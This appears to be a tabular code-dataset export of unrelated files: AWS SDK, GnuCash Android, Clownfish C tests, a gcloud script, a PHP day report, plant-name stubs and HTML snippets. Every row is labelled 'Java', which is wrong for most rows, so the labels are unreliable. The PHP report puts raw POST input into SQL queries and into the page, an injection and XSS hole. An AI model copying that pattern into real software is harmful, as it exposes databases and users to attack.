code
stringlengths
4
1.01M
language
stringclasses
2 values
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.mediaconvert.model; import javax.annotation.Generated; /** * Use Deinterlacer (DeinterlaceMode) to choose how the service will do deinterlacing. Default is Deinterlace. - * Deinterlace converts interlaced to progressive. - Inverse telecine converts Hard Telecine 29.97i to progressive * 23.976p. - Adaptive auto-detects and converts to progressive. */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public enum DeinterlacerMode { DEINTERLACE("DEINTERLACE"), INVERSE_TELECINE("INVERSE_TELECINE"), ADAPTIVE("ADAPTIVE"); private String value; private DeinterlacerMode(String value) { this.value = value; } @Override public String toString() { return this.value; } /** * Use this in place of valueOf. * * @param value * real value * @return DeinterlacerMode corresponding to the value * * @throws IllegalArgumentException * If the specified value does not map to one of the known values in this enum. */ public static DeinterlacerMode fromValue(String value) { if (value == null || "".equals(value)) { throw new IllegalArgumentException("Value cannot be null or empty!"); } for (DeinterlacerMode enumEntry : DeinterlacerMode.values()) { if (enumEntry.toString().equals(value)) { return enumEntry; } } throw new IllegalArgumentException("Cannot create enum from " + value + " value!"); } }
Java
using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Cats.Models { public class RationDetail { public int RationDetailID { get; set; } public int RationID { get; set; } public int CommodityID { get; set; } public decimal Amount { get; set; } public Nullable<int> UnitID { get; set; } public virtual Commodity Commodity { get; set; } public virtual Ration Ration { get; set; } public virtual Unit Unit { get; set; } } }
Java
if [ -z "$1" ] then echo "Usage: startup_node.sh <id_for_node>" exit fi num_gpus=$2 if [ -z "$2" ] then num_gpus=1 echo "num_gpus not specified. Defaulting to 1" fi gcloud compute --project "visualdb-1046" disks create "hackinstance-$1" --size "20" --zone "us-east1-d" --source-snapshot "hacksnapshot" --type "pd-standard" gcloud beta compute --project "visualdb-1046" instances create "hackinstance-$1" --zone "us-east1-d" --machine-type "n1-standard-4" --network "default" --metadata "ssh-keys=ubuntu:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXJ3JrrWKc0TAM5KBXYmuTVAG06DyA8F1hHbqUULCNp767bDNN1dTF9zTo+ZDWdCuHm49XWrpRK552G8U0A55HvBEjOj4eEUSuAibd0uDAYMZr3dJNTzXNU/KfgnbJYGbRboBk3fu47D4bhKPmjX5ZDsSN++BuUYpf1bH829invPBzlGeBb/QRe3Jk9DMK/swIqFc4j6PWeOItj4/1flXFFruR/bT0p2/MIxTTAMAWlhHRYqhtia1YYMbfdv38eqZMH1GY+n7GQJTuKBDvz0qPxCus86xaE4vCawD+iQJFuD8XxppsHbc1+oCAmi5AtbUeHXjXirN95itMBi7S2evd ubuntu,node_id=$1" --maintenance-policy "TERMINATE" --service-account "50518136478-compute@developer.gserviceaccount.com" --scopes "https://www.googleapis.com/auth/cloud-platform" --accelerator type=nvidia-tesla-k80,count=$num_gpus --tags "http-server","https-server" --disk "name=hackinstance-$1,device-name=hackinstance-$1,mode=rw,boot=yes,auto-delete=yes"
Java
<!--- Provide a general summary of your changes in the Title above --> ## Description <!--- Describe your changes in detail --> ## Related Issue <!--- This project only accepts pull requests related to open issues --> <!--- If suggesting a new feature or change, please discuss it in an issue first --> <!--- If fixing a bug, there should be an issue describing it with steps to reproduce --> <!--- Please link to the issue here: --> ## Motivation and Context <!--- Why is this change required? What problem does it solve? --> ## How Has This Been Tested? <!--- Please describe in detail how you tested your changes. --> <!--- Include details of your testing environment, and the tests you ran to --> <!--- see how your change affects other areas of the code, etc. --> ## Screenshots (if appropriate): ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [ ] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Checklist: <!--- Go over all the following points, and put an `x` in all the boxes that apply. --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] I have signed the [Adobe Open Source CLA](https://opensource.adobe.com/cla.html). - [ ] My code follows the code style of this project. - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. - [ ] I have read the **CONTRIBUTING** document. - [ ] I have added tests to cover my changes. - [ ] All new and existing tests passed.
Java
<!DOCTYPE html> <meta charset="utf-8"> <!--This page is adapted from Mike Bostock and Scott Murray's d3.js examples--> <style> .link { stroke: #ccc; } .node text { pointer-events: none; font: 10px sans-serif; } </style> <body> <script src="http://d3js.org/d3.v3.min.js"></script> <script> var width = 960; var height = 600; var colors = d3.scale.category10(); var svg = d3.select("body").append("svg") .attr("width", width) .attr("height", height); var force = d3.layout.force() .gravity(.25) .distance(50) .charge(-300) .size([width, height]); svg.append("text").attr("id", "tooltip"); d3.json("graph.json", function(error, json) { force .nodes(json.nodes) .links(json.links) .start(); var link = svg.selectAll(".link") .data(json.links) .enter().append("line") .attr("class", "link"); var node = svg.selectAll(".node") .data(json.nodes) .enter().append("g") .attr("class", "node") .call(force.drag); node.append("circle") .attr("x", -8) .attr("y", -8) .attr("r", function(d){ return 1 + Math.sqrt(Math.pow(1.6, d.degree)/Math.PI) ; } ) .style("fill", function(d, i){ return colors(i); } ) .on("mouseover", function(d){ var xPosition = d3.event.clientX; var yPosition = d3.event.clientY; d3.select("#tooltip").remove(); svg.append("text") .attr("id", "tooltip") .attr("x", xPosition) .attr("y", yPosition) .attr("text-anchor", "middle") .attr("font-family", "sans-serif") .attr("font-size", "11px") .attr("font-weight", "bold") .attr("fill", "black") .text(d.name + "(@" + d.scr_name + "), followed by " + d.degree + " users"); } ) .on("mouseout", function(){ d3.select("#tooltip") .transition() .delay(1500) .text(""); } ) ; force.on("tick", function() { link.attr("x1", function(d) { return d.source.x; }) .attr("y1", function(d) { return d.source.y; }) .attr("x2", function(d) { return d.target.x; }) .attr("y2", function(d) { return d.target.y; }); node.attr("transform", function(d) { return "translate(" + d.x + "," + d.y + ")"; }); }); }); </script> </body> </html>
Java
<div id="print_area" style="width:200px; font-size:12px;"> <?php include('dbcon_s.php'); $date=date('Y-m-d', $time_now); if($_POST['h_status']=='off') { $query=mysql_query("select count(*) as num_order, sum(person) as total_person, sum(order_total) as total_order, sum(discount) as total_discount, sum(ser_charge) as total_s_charge, sum(vat_total) as total_vat, sum(cash) as total_cash, date from order_list where status='false' AND date='$date' AND terminal='".$_POST['terminal']."'"); } else { $query=mysql_query("select count(*) as num_order, sum(person) as total_person, sum(order_total) as total_order, sum(discount) as total_discount, sum(ser_charge) as total_s_charge, sum(vat_total) as total_vat, sum(cash) as total_cash, date from order_list where status='false' AND date='$date' AND terminal='".$_POST['terminal']."'"); } $row=mysql_fetch_array($query); ?> <h2 style="text-align:center; font-family:Forte; margin:0px; padding:0px;">La Bamba</h2> <p style="text-align:center; margin:0px; font-size:12px;"> House # 54, Road # 20,<br /> Sector # 03, Rabindra Sarani<br /> Uttara, Dhaka-1230<br /> Phone : 01759783896-7<br /> Vat Reg No: 5111110711 </p> <p style="text-align:center; margin:0px; font-size:12px;"> Day Report (<?php echo $_POST['terminal']; ?>) </p> Report Date : <?php echo $row['date']; ?><br /> Print Date : <?php echo $date; ?><br /> <table cellspacing="0" style="width:100%; font-size:12px;"> <tr> <th style="text-align:left">Number of order:</th> <th style="text-align:left;"><?php echo $row['num_order']; ?></th> </tr> <tr> <th style="text-align:left">Total Person:</th> <th style="text-align:left;"><?php echo $row['total_person']; ?></th> </tr> <tr> <th style="text-align:left">Total Order:</th> <th style="text-align:left;"><?php echo $row['total_order']; ?></th> </tr> <tr> <th style="text-align:left">Total Discount:</th> <th style="text-align:left;"><?php echo $row['total_discount']; ?></th> </tr> <tr> <th style="text-align:left">Total Service Charge:</th> <th style="text-align:left;"><?php echo $row['total_s_charge']; ?></th> </tr> <tr> <th style="text-align:left">Total Vat:</th> <th style="text-align:left;"><?php echo $row['total_vat']; ?></th> </tr> <tr> <th style="text-align:left">Total Cash:</th> <th style="text-align:left;"><?php echo $row['total_cash']; ?></th> </tr> </table> <br /> <div style="border-bottom:1px dotted #000;"></div> <br /> Day report (<?php echo $_POST['terminal']; ?>) printed by : <?php echo $_POST['user']; ?> </div>
Java
/* * Copyright (c) 2015 Ngewi Fet <ngewif@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.gnucash.android.ui.common; import android.app.Activity; import android.content.Intent; import android.content.SharedPreferences; import android.content.res.Configuration; import android.database.Cursor; import android.graphics.Color; import android.graphics.PorterDuff; import android.os.Build; import android.os.Bundle; import android.preference.PreferenceManager; import android.support.annotation.LayoutRes; import android.support.annotation.StringRes; import android.support.design.widget.NavigationView; import android.support.v4.widget.DrawerLayout; import android.support.v7.app.ActionBar; import android.support.v7.app.ActionBarDrawerToggle; import android.support.v7.widget.PopupMenu; import android.support.v7.widget.Toolbar; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.widget.ProgressBar; import android.widget.TextView; import com.uservoice.uservoicesdk.UserVoice; import org.gnucash.android.R; import org.gnucash.android.app.GnuCashApplication; import org.gnucash.android.db.DatabaseSchema; import org.gnucash.android.db.adapter.BooksDbAdapter; import org.gnucash.android.ui.account.AccountsActivity; import org.gnucash.android.ui.passcode.PasscodeLockActivity; import org.gnucash.android.ui.report.ReportsActivity; import org.gnucash.android.ui.settings.PreferenceActivity; import org.gnucash.android.ui.transaction.ScheduledActionsActivity; import butterknife.BindView; import butterknife.ButterKnife; /** * Base activity implementing the navigation drawer, to be extended by all activities requiring one. * <p> * Each activity inheriting from this class has an indeterminate progress bar at the top, * (above the action bar) which can be used to display busy operations. See {@link #getProgressBar()} * </p> * * <p>Sub-classes should simply provide their layout using {@link #getContentView()} and then annotate * any variables they wish to use with {@link ButterKnife#bind(Activity)} annotations. The view * binding will be done in this base abstract class.<br> * The activity layout of the subclass is expected to contain {@code DrawerLayout} and * a {@code NavigationView}.<br> * Sub-class should also consider using the {@code toolbar.xml} or {@code toolbar_with_spinner.xml} * for the action bar in their XML layout. Otherwise provide another which contains widgets for the * toolbar and progress indicator with the IDs {@code R.id.toolbar} and {@code R.id.progress_indicator} respectively. * </p> * @author Ngewi Fet <ngewif@gmail.com> */ public abstract class BaseDrawerActivity extends PasscodeLockActivity implements PopupMenu.OnMenuItemClickListener { public static final int ID_MANAGE_BOOKS = 0xB00C; @BindView(R.id.drawer_layout) DrawerLayout mDrawerLayout; @BindView(R.id.nav_view) NavigationView mNavigationView; @BindView(R.id.toolbar) Toolbar mToolbar; @BindView(R.id.toolbar_progress) ProgressBar mToolbarProgress; protected TextView mBookNameTextView; protected ActionBarDrawerToggle mDrawerToggle; public static final int REQUEST_OPEN_DOCUMENT = 0x20; private class DrawerItemClickListener implements NavigationView.OnNavigationItemSelectedListener { @Override public boolean onNavigationItemSelected(MenuItem menuItem) { onDrawerMenuItemClicked(menuItem.getItemId()); return true; } } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(getContentView()); //if a parameter was passed to open an account within a specific book, then switch String bookUID = getIntent().getStringExtra(UxArgument.BOOK_UID); if (bookUID != null && !bookUID.equals(BooksDbAdapter.getInstance().getActiveBookUID())){ GnuCashApplication.activateBook(bookUID); } ButterKnife.bind(this); setSupportActionBar(mToolbar); final ActionBar actionBar = getSupportActionBar(); if (actionBar != null){ actionBar.setHomeButtonEnabled(true); actionBar.setDisplayHomeAsUpEnabled(true); actionBar.setTitle(getTitleRes()); } mToolbarProgress.getIndeterminateDrawable().setColorFilter(Color.WHITE, PorterDuff.Mode.SRC_IN); View headerView = mNavigationView.getHeaderView(0); headerView.findViewById(R.id.drawer_title).setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { onClickAppTitle(v); } }); mBookNameTextView = (TextView) headerView.findViewById(R.id.book_name); mBookNameTextView.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { onClickBook(v); } }); updateActiveBookName(); setUpNavigationDrawer(); } @Override protected void onResume() { super.onResume(); updateActiveBookName(); } /** * Return the layout to inflate for this activity * @return Layout resource identifier */ public abstract @LayoutRes int getContentView(); /** * Return the title for this activity. * This will be displayed in the action bar * @return String resource identifier */ public abstract @StringRes int getTitleRes(); /** * Returns the progress bar for the activity. * <p>This progress bar is displayed above the toolbar and should be used to show busy status * for long operations.<br/> * The progress bar visibility is set to {@link View#GONE} by default. Make visible to use </p> * @return Indeterminate progress bar. */ public ProgressBar getProgressBar(){ return mToolbarProgress; } /** * Sets up the navigation drawer for this activity. */ private void setUpNavigationDrawer() { mNavigationView.setNavigationItemSelectedListener(new DrawerItemClickListener()); mDrawerToggle = new ActionBarDrawerToggle( this, /* host Activity */ mDrawerLayout, /* DrawerLayout object */ R.string.drawer_open, /* "open drawer" description */ R.string.drawer_close /* "close drawer" description */ ) { /** Called when a drawer has settled in a completely closed state. */ public void onDrawerClosed(View view) { super.onDrawerClosed(view); } /** Called when a drawer has settled in a completely open state. */ public void onDrawerOpened(View drawerView) { super.onDrawerOpened(drawerView); } }; mDrawerLayout.setDrawerListener(mDrawerToggle); } @Override protected void onPostCreate(Bundle savedInstanceState) { super.onPostCreate(savedInstanceState); mDrawerToggle.syncState(); } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); mDrawerToggle.onConfigurationChanged(newConfig); } @Override public boolean onOptionsItemSelected(MenuItem item) { if (item.getItemId() == android.R.id.home){ if (!mDrawerLayout.isDrawerOpen(mNavigationView)) mDrawerLayout.openDrawer(mNavigationView); else mDrawerLayout.closeDrawer(mNavigationView); return true; } return super.onOptionsItemSelected(item); } /** * Update the display name of the currently active book */ protected void updateActiveBookName(){ mBookNameTextView.setText(BooksDbAdapter.getInstance().getActiveBookDisplayName()); } /** * Handler for the navigation drawer items * */ protected void onDrawerMenuItemClicked(int itemId) { switch (itemId){ case R.id.nav_item_open: { //Open... files if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT){ //use the storage access framework Intent openDocument = new Intent(Intent.ACTION_OPEN_DOCUMENT); openDocument.addCategory(Intent.CATEGORY_OPENABLE); openDocument.setType("*/*"); startActivityForResult(openDocument, REQUEST_OPEN_DOCUMENT); } else { AccountsActivity.startXmlFileChooser(this); } } break; case R.id.nav_item_favorites: { //favorite accounts Intent intent = new Intent(this, AccountsActivity.class); intent.putExtra(AccountsActivity.EXTRA_TAB_INDEX, AccountsActivity.INDEX_FAVORITE_ACCOUNTS_FRAGMENT); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP|Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; case R.id.nav_item_reports: { Intent intent = new Intent(this, ReportsActivity.class); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; /* //todo: Re-enable this when Budget UI is complete case R.id.nav_item_budgets: startActivity(new Intent(this, BudgetsActivity.class)); break; */ case R.id.nav_item_scheduled_actions: { //show scheduled transactions Intent intent = new Intent(this, ScheduledActionsActivity.class); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; case R.id.nav_item_export: AccountsActivity.openExportFragment(this); break; case R.id.nav_item_settings: //Settings activity startActivity(new Intent(this, PreferenceActivity.class)); break; case R.id.nav_item_help: SharedPreferences prefs = PreferenceManager.getDefaultSharedPreferences(this); prefs.edit().putBoolean(UxArgument.SKIP_PASSCODE_SCREEN, true).apply(); UserVoice.launchUserVoice(this); break; } mDrawerLayout.closeDrawer(mNavigationView); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (resultCode == Activity.RESULT_CANCELED) { super.onActivityResult(requestCode, resultCode, data); return; } switch (requestCode) { case AccountsActivity.REQUEST_PICK_ACCOUNTS_FILE: AccountsActivity.importXmlFileFromIntent(this, data, null); break; case BaseDrawerActivity.REQUEST_OPEN_DOCUMENT: //this uses the Storage Access Framework final int takeFlags = data.getFlags() & (Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION); AccountsActivity.importXmlFileFromIntent(this, data, null); getContentResolver().takePersistableUriPermission(data.getData(), takeFlags); break; default: super.onActivityResult(requestCode, resultCode, data); break; } } @Override public boolean onMenuItemClick(MenuItem item) { long id = item.getItemId(); if (id == ID_MANAGE_BOOKS){ Intent intent = new Intent(this, PreferenceActivity.class); intent.setAction(PreferenceActivity.ACTION_MANAGE_BOOKS); startActivity(intent); mDrawerLayout.closeDrawer(mNavigationView); return true; } BooksDbAdapter booksDbAdapter = BooksDbAdapter.getInstance(); String bookUID = booksDbAdapter.getUID(id); if (!bookUID.equals(booksDbAdapter.getActiveBookUID())){ GnuCashApplication.loadBook(bookUID); finish(); } AccountsActivity.start(GnuCashApplication.getAppContext()); return true; } public void onClickAppTitle(View view){ mDrawerLayout.closeDrawer(mNavigationView); AccountsActivity.start(this); } public void onClickBook(View view){ PopupMenu popup = new PopupMenu(this, view); popup.setOnMenuItemClickListener(this); Menu menu = popup.getMenu(); int maxRecent = 0; Cursor cursor = BooksDbAdapter.getInstance().fetchAllRecords(null, null, DatabaseSchema.BookEntry.COLUMN_MODIFIED_AT + " DESC"); while (cursor.moveToNext() && maxRecent++ < 5) { long id = cursor.getLong(cursor.getColumnIndexOrThrow(DatabaseSchema.BookEntry._ID)); String name = cursor.getString(cursor.getColumnIndexOrThrow(DatabaseSchema.BookEntry.COLUMN_DISPLAY_NAME)); menu.add(0, (int)id, maxRecent, name); } menu.add(0, ID_MANAGE_BOOKS, maxRecent, R.string.menu_manage_books); popup.show(); } }
Java
/* Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <string.h> #define CFISH_USE_SHORT_NAMES #define TESTCFISH_USE_SHORT_NAMES #include "Clownfish/Test/Util/TestStringHelper.h" #include "Clownfish/String.h" #include "Clownfish/Err.h" #include "Clownfish/Test.h" #include "Clownfish/TestHarness/TestBatchRunner.h" #include "Clownfish/Util/StringHelper.h" #include "Clownfish/Class.h" /* This alternative implementation of utf8_valid() is (presumably) slower, but * it implements the standard in a more linear, easy-to-grok way. */ #define TRAIL_OK(n) (n >= 0x80 && n <= 0xBF) TestStringHelper* TestStrHelp_new() { return (TestStringHelper*)Class_Make_Obj(TESTSTRINGHELPER); } static bool S_utf8_valid_alt(const char *maybe_utf8, size_t size) { const uint8_t *string = (const uint8_t*)maybe_utf8; const uint8_t *const end = string + size; while (string < end) { int count = StrHelp_UTF8_COUNT[*string]; bool valid = false; if (count == 1) { if (string[0] <= 0x7F) { valid = true; } } else if (count == 2) { if (string[0] >= 0xC2 && string[0] <= 0xDF) { if (TRAIL_OK(string[1])) { valid = true; } } } else if (count == 3) { if (string[0] == 0xE0) { if (string[1] >= 0xA0 && string[1] <= 0xBF && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] >= 0xE1 && string[0] <= 0xEC) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] == 0xED) { if (string[1] >= 0x80 && string[1] <= 0x9F && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] >= 0xEE && string[0] <= 0xEF) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) ) { valid = true; } } } else if (count == 4) { if (string[0] == 0xF0) { if (string[1] >= 0x90 && string[1] <= 0xBF && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } else if (string[0] >= 0xF1 && string[0] <= 0xF3) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } else if (string[0] == 0xF4) { if (string[1] >= 0x80 && string[1] <= 0x8F && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } } if (!valid) { return false; } string += count; } if (string != end) { return false; } return true; } static void test_overlap(TestBatchRunner *runner) { size_t result; result = StrHelp_overlap("", "", 0, 0); TEST_INT_EQ(runner, result, 0, "two empty strings"); result = StrHelp_overlap("", "foo", 0, 3); TEST_INT_EQ(runner, result, 0, "first string is empty"); result = StrHelp_overlap("foo", "", 3, 0); TEST_INT_EQ(runner, result, 0, "second string is empty"); result = StrHelp_overlap("foo", "foo", 3, 3); TEST_INT_EQ(runner, result, 3, "equal strings"); result = StrHelp_overlap("foo bar", "foo", 7, 3); TEST_INT_EQ(runner, result, 3, "first string is longer"); result = StrHelp_overlap("foo", "foo bar", 3, 7); TEST_INT_EQ(runner, result, 3, "second string is longer"); } static void test_to_base36(TestBatchRunner *runner) { char buffer[StrHelp_MAX_BASE36_BYTES]; StrHelp_to_base36(UINT64_MAX, buffer); TEST_STR_EQ(runner, "3w5e11264sgsf", buffer, "base36 UINT64_MAX"); StrHelp_to_base36(1, buffer); TEST_STR_EQ(runner, "1", buffer, "base36 1"); TEST_INT_EQ(runner, buffer[1], 0, "base36 NULL termination"); } static void test_utf8_round_trip(TestBatchRunner *runner) { int32_t code_point; for (code_point = 0; code_point <= 0x10FFFF; code_point++) { char buffer[4]; uint32_t size = StrHelp_encode_utf8_char(code_point, buffer); char *start = buffer; char *end = start + size; // Verify length returned by encode_utf8_char(). if (size != StrHelp_UTF8_COUNT[(unsigned char)buffer[0]]) { break; } // Verify that utf8_valid() agrees with alternate implementation. if (!!StrHelp_utf8_valid(start, size) != !!S_utf8_valid_alt(start, size) ) { break; } // Verify back_utf8_char(). if (StrHelp_back_utf8_char(end, start) != start) { break; } // Verify round trip of encode/decode. if (StrHelp_decode_utf8_char(buffer) != code_point) { break; } } if (code_point == 0x110000) { PASS(runner, "Successfully round tripped 0 - 0x10FFFF"); } else { FAIL(runner, "Failed round trip at 0x%.1X", (unsigned)code_point); } } static void S_test_validity(TestBatchRunner *runner, const char *content, size_t size, bool expected, const char *description) { bool sane = StrHelp_utf8_valid(content, size); bool double_check = S_utf8_valid_alt(content, size); if (sane != double_check) { FAIL(runner, "Disagreement: %s", description); } else { TEST_TRUE(runner, sane == expected, "%s", description); } } static void test_utf8_valid(TestBatchRunner *runner) { // Musical symbol G clef: // Code point: U+1D11E // UTF-16: 0xD834 0xDD1E // UTF-8 0xF0 0x9D 0x84 0x9E S_test_validity(runner, "\xF0\x9D\x84\x9E", 4, true, "Musical symbol G clef"); S_test_validity(runner, "\xED\xA0\xB4\xED\xB4\x9E", 6, false, "G clef as UTF-8 encoded UTF-16 surrogates"); S_test_validity(runner, ".\xED\xA0\xB4.", 5, false, "Isolated high surrogate"); S_test_validity(runner, ".\xED\xB4\x9E.", 5, false, "Isolated low surrogate"); // Shortest form. S_test_validity(runner, ".\xC1\x9C.", 4, false, "Non-shortest form ASCII backslash"); S_test_validity(runner, ".\xC0\xAF.", 4, false, "Non-shortest form ASCII slash"); S_test_validity(runner, ".\xC0\x80.", 4, false, "Non-shortest form ASCII NUL character"); // Range. S_test_validity(runner, "\xF8\x88\x80\x80\x80", 5, false, "5-byte UTF-8"); // Bad continuations. S_test_validity(runner, "\xE2\x98\xBA\xE2\x98\xBA", 6, true, "SmileySmiley"); S_test_validity(runner, "\xE2\xBA\xE2\x98\xBA", 5, false, "missing first continuation byte"); S_test_validity(runner, "\xE2\x98\xE2\x98\xBA", 5, false, "missing second continuation byte"); S_test_validity(runner, "\xE2\xE2\x98\xBA", 4, false, "missing both continuation bytes"); S_test_validity(runner, "\xBA\xE2\x98\xBA\xE2\xBA", 5, false, "missing first continuation byte (end)"); S_test_validity(runner, "\xE2\x98\xBA\xE2\x98", 5, false, "missing second continuation byte (end)"); S_test_validity(runner, "\xE2\x98\xBA\xE2", 4, false, "missing both continuation bytes (end)"); S_test_validity(runner, "\xBA\xE2\x98\xBA", 4, false, "isolated continuation byte 0xBA"); S_test_validity(runner, "\x98\xE2\x98\xBA", 4, false, "isolated continuation byte 0x98"); S_test_validity(runner, "\xE2\x98\xBA\xBA", 4, false, "isolated continuation byte 0xBA (end)"); S_test_validity(runner, "\xE2\x98\xBA\x98", 4, false, "isolated continuation byte 0x98 (end)"); } static void test_is_whitespace(TestBatchRunner *runner) { TEST_TRUE(runner, StrHelp_is_whitespace(' '), "space is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\n'), "newline is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\t'), "tab is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\v'), "vertical tab is whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace('a'), "'a' isn't whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace(0), "NULL isn't whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace(0x263A), "Smiley isn't whitespace"); } static void test_back_utf8_char(TestBatchRunner *runner) { char buffer[4]; char *buf = buffer + 1; uint32_t len = StrHelp_encode_utf8_char(0x263A, buffer); char *end = buffer + len; TEST_TRUE(runner, StrHelp_back_utf8_char(end, buffer) == buffer, "back_utf8_char"); TEST_TRUE(runner, StrHelp_back_utf8_char(end, buf) == NULL, "back_utf8_char returns NULL rather than back up beyond start"); TEST_TRUE(runner, StrHelp_back_utf8_char(buffer, buffer) == NULL, "back_utf8_char returns NULL when end == start"); } void TestStrHelp_Run_IMP(TestStringHelper *self, TestBatchRunner *runner) { TestBatchRunner_Plan(runner, (TestBatch*)self, 39); test_overlap(runner); test_to_base36(runner); test_utf8_round_trip(runner); test_utf8_valid(runner); test_is_whitespace(runner); test_back_utf8_char(runner); }
Java
# Gardenia squamifera R.D.Good SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Agassizia cheiranthifolia Spach SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Quercus cryptoneuron H.Lév. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Pirigara globosa Span. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
function $childNode(o) { return window.frames[o] } function animationHover(o, e) { o = $(o), o.hover(function () { o.addClass("animated " + e) }, function () { window.setTimeout(function () { o.removeClass("animated " + e) }, 2e3) }) } function WinMove() { var o = "[class*=col]", e = ".ibox-title", i = "[class*=col]"; $(o).sortable({ handle: e, connectWith: i, tolerance: "pointer", forcePlaceholderSize: !0, opacity: .8 }).disableSelection() } var $parentNode = window.parent.document; if ($(".tooltip-demo").tooltip({ selector: "[data-toggle=tooltip]", container: "body" }), $(".modal").appendTo("body"), $("[data-toggle=popover]").popover(), $(".collapse-link").click(function () { var o = $(this).closest("div.ibox"), e = $(this).find("i"), i = o.find("div.ibox-content"); i.slideToggle(200), e.toggleClass("fa-chevron-up").toggleClass("fa-chevron-down"), o.toggleClass("").toggleClass("border-bottom"), setTimeout(function () { o.resize(), o.find("[id^=map-]").resize() }, 50) }), $(".close-link").click(function () { var o = $(this).closest("div.ibox"); o.remove() }), top == this) { }
Java
# Crepidium kerintjiense (J.J.Sm.) Szlach. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name Microstylis kerintjiensis J.J.Sm. ### Remarks null
Java
# Stylochaeton zenkeri Engl. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>无标题文档</title> <link href="../../../../../src/css/29tree.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="tree" id="c1"> <div class="root open"> <div class="tag"> <div class="text">XLib</div> </div> <div class="childs"> <div class="folder normal open"> <div class="tag"> <div class="text">base</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> <div class="folder normal close"> <div class="tag"> <div class="text">ui</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div 